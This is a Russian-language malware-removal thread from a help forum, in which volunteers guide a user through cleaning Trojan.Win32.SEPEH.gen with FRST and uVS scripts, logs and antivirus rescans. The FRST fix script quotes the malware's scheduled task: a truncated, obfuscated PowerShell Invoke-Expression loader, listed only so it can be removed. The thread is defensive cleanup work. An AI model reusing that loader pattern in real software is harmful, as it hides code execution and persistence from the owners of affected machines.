MEM:Trojan.Win32.SEPEH.gen

[Sandor]

• Отключите до перезагрузки антивирус.
• Выделите следующий код:

  Start::
  CloseProcesses:
  SystemRestore: On
  CreateRestorePoint:
  Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-CcVuc329 => C:\Windows\system32\cmd.exe [339968 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> /C echo function mXiJ($ocUH){	Invoke-Expression -Debug -InformationAction Ignore '$Bwqa=ie[ieSyiestieemie.Sieeiecieuierieiietyie.ieCierieyiepietoiegierieaiepiehiey.ieAieeiesie]:ie:ieCierieeieatieeie(ie);'.Replace('ie', '');	Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction (запись имеет ещё 3541 символов). <==== ВНИМАНИЕ
  FirewallRules: [{DD1CE507-77A0-4C90-BBB4-4F4468856A14}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
  FirewallRules: [{6A5DAEB1-DEE7-47AE-A319-76EC3E56588C}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла
  FirewallRules: [{6B9FD7B8-B9FA-4513-B3C9-27DB457F5857}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
  FirewallRules: [{EF9D1807-7C8F-4DF3-8BA7-D59544D53B89}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла
  Reboot:
  End::

   

• Скопируйте выделенный текст (правой кнопкой - Копировать).
• Запустите FRST (FRST64) от имени администратора.
• Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

После этого проверьте ещё раз антивирусом Касперского.

[eosex]

Все так же... фикс прикрепил, не понимаю, почему не получается их удалить..

Fixlog.txt

[eosex]

помогите, пожалуйста

[thyrex]

Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат.

[eosex]

SEPEH пропали, но пишется, что 1 объект не обработан. Захожу посмотреть, что за объект, а его просто него.

[Sandor]

Соберите ещё раз новые логи FRST.txt и Addition.txt

[Sandor]

А также ещё раз соберите образ uVS, пожалуйста.

[eosex]

Извиняюсь, спал. Все прикрепил!

Addition.txt FRST.txt ARGENTYPE_2025-03-26_14-16-36_v4.99.10v x64.7z

[Sandor]

В логах я проблем не вижу.

 

16 часов назад, eosex сказал:

пишется, что 1 объект не обработан

Это всё ещё есть?

[eosex]

щас проверку запустил, скажу если что-то не так

[Sandor]

Хорошо. По окончании сделаем некоторую очистку.

1. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
2. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
3. Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

   ;uVS v4.99.10v x64 [http://dsrt.dyndns.org:8888]
   ;Target OS: NTv11.0
   v400c
   
   ;---------command-block---------
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\BNXHAIMOJRLGGDXNTJGRBUBJGMBWV
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\FBZQZKYQWHMMOYWSDKXSONUCTVO
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\JCZIHPSLDYBAISDGURDJNFEWNUFVD
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\TUUFEMTZNEUSPYUFOOBOX
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\VCPLITLKUBMKH
   delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\XSYBZVJJKRJNKEV
   apply
   
   regt 40
   
   restart

    

4. В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена…"
5. Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен.
6. В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению.

Подробнее читайте в этом руководстве.

[eosex]

Очистку сделал

[Sandor]

14 минут назад, Sandor сказал:

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению

Файл забыли.

[eosex]

2025-03-26_15-09-18_log.txt

[Sandor]

Чтобы просмотреть отчеты, выполните следующие действия:

1. В главном окне приложения в разделе Мониторинг нажмите на плитку Отчеты. Отчеты
2. В списке компонентов и задач выберите компонент или задачу. ...
3. Если требуется просмотреть подробную информацию о событии, выберите в отчете нужное событие.

Так получится посмотреть (а лучше экспортировать) отчёт об этой невидимой угрозе?